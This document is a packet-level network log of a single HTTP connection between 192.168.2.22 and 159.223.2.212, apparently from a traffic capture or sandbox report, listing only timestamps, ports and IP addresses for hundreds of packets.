Sep 23, 2022 08:13:09.010636091 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010651112 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010664940 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.010685921 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.010781050 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010797977 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010809898 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010822058 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010833979 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010868073 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010880947 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010931969 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010978937 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.011039972 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.011173010 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011190891 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011291981 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011300087 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.011308908 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011324883 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011379004 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.011516094 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011553049 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011570930 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011588097 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011605024 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011620998 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011632919 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011632919 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.011645079 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011687994 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011729956 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011746883 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011751890 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.011763096 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011791945 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011827946 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011826992 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.011843920 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011858940 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011874914 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011890888 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011905909 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011908054 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.011921883 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011925936 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.011943102 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.011948109 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011964083 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.011992931 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012010098 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012008905 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012022018 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012025118 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012041092 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012058020 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012061119 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012068987 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012104034 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012197018 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012217045 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012238979 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012245893 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012255907 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012258053 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012283087 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012299061 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012305021 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012319088 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012320995 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012331009 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012336016 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012352943 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012368917 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012387037 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012391090 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012399912 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012403011 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012418985 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012434959 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012449980 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012465954 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012470007 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012481928 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012481928 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012502909 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012521982 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012526989 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012537956 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012542963 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012559891 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012576103 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012592077 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012598991 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012607098 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012618065 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012623072 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012639046 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012653112 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012669086 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012685061 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012685061 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012696028 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012701988 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012717009 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012729883 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012742996 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012756109 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012767076 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012788057 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012803078 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012804985 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012820005 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012835026 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012849092 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012851000 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012867928 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012907982 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012912035 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012923956 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.012924910 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012964010 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.012984037 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013005018 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013032913 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013037920 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013048887 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013053894 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013094902 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013102055 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013112068 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013133049 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013200045 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013211012 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013252974 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013268948 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013283968 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013298035 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013320923 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013338089 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013336897 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013350964 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013354063 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013370037 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013422966 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013454914 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013461113 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013465881 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013473034 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013484955 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013499975 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013513088 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013525963 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013525963 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013544083 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013565063 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013581991 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013598919 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013600111 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013614893 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013622046 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013632059 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013668060 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013679028 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013695955 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013710976 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013726950 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013742924 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013756037 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013758898 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013775110 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013791084 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013817072 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013827085 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013834000 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013839960 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013879061 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013895035 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013905048 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013911009 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013926983 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013945103 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013956070 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013961077 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.013967037 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.013977051 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.014060974 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.014076948 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.014081955 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.014159918 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.014168978 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.014174938 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.014190912 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.014203072 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.014257908 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.014466047 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.034950972 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.034987926 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035011053 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035027981 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035052061 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035068989 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035094023 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035118103 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035139084 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035156965 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035168886 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035180092 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035202026 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035203934 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035223007 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035227060 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035249949 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035259962 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035271883 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035293102 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035303116 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035315037 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035361052 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035366058 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035406113 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035429001 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035437107 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035461903 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035491943 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035510063 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035516024 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035537958 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035550117 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035581112 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035599947 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035610914 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035640001 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035671949 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035677910 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035697937 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035726070 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.035862923 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035917044 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035948992 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035974026 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.035996914 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036019087 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036041975 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036065102 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036094904 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036314011 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036350012 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.036353111 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036375999 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036393881 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036408901 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036422968 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036442041 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036456108 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036469936 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036489964 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.036494017 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036518097 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036536932 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036550045 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.036556959 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.036562920 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.036595106 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037220955 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037250042 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037271976 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037293911 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037302971 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037334919 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037345886 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037364006 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037420988 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037429094 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037457943 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037486076 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037513971 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037517071 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037543058 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037570000 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037583113 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037596941 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037630081 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037653923 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037674904 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037697077 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037702084 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037725925 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037753105 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037777901 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037795067 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037822008 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037826061 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037849903 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037873983 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037878036 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037905931 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037933111 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037944078 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.037961960 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.037992001 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038002968 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038019896 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038043022 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038064003 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038074017 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038100958 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038111925 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038129091 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038156986 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038161993 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038187027 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038218975 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038232088 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038248062 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038276911 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038276911 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038305044 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038324118 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038342953 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038357019 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038383961 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038392067 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038412094 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038439989 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038445950 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038469076 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038492918 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038511038 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038521051 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038547993 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038551092 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038577080 CEST	80	49172	159.223.2.212	192.168.2.22
